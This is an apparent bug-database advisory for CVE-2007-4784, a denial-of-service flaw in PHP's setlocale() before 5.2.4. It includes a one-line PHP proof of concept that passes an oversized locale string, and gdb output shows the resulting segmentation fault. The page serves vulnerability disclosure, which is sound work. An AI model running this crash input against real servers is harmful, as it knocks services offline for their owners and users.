Bug: PHP < 5.2.4 setlocale() denial of service ( Ascii Version )

	WLB2.ORG
Full List

Bugs

Bogus

Tricks

Exploits

	CVEMAP.ORG
Full List

Vendors

Products

	Tools
CWE Dictionary

Dorks List

cIFrex

	Search
Bugtraq

CVEMAP

CVE Id

CWE Id

	RSS
Full List

Bugs

Exploits

Dorks

	Information
Add note

About



	Submit
To add a note, use this form or send email to submit@cxsec.org


	Social

PHP < 5.2.4 setlocale() denial of service

Published	Credit	Risk
2007.09.12	laurent gaffie	Low

CWE	CVE	Local	Remote
CWE-20	CVE-2007-4784	Yes	No

CVSS Base Score	Impact Subscore		Exploitability Subscore
5/10	2.9/10		10/10

Exploit range	Attack complexity	Authentication
Remote	Low	No required
Confidentiality impact	Integrity impact	Availability impact
None	None	Partial

Application: PHP < 5.2.4
Web Site: http://php.net
Platform: unix
Bug: denial of service
fonction: setlocale()
special condition: default php-memory-limit
-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========

"PHP is a widely-used general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML."

======
2) Bug
======

setlocale() is vulnerable to a denial of service

=====
3)Proof of concept
=====

Proof of concept example :
<?php
setlocale(LC_COLLATE, str_repeat("A", 34438013));
?>

result:
(gdb) run ./1.php
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1215805760 (LWP 10504)]
0xb78a584b in setlocale () from /lib/tls/i686/cmov/libc.so.6

========
4)Greets
========
Ivanlef0u,Deimos,benji,soh,and everyones on worldnet: #futurezone & #nibbles

=====
5)Credits
=====

Laurent gaffie
contact : laurent.gaffie (at) gmail (dot) com [email concealed]
stay tuned, site comming soon ....

ASCII VERSION

Ascii Version

Bug: PHP < 5.2.4 setlocale() denial of service ( Ascii Version )

use this form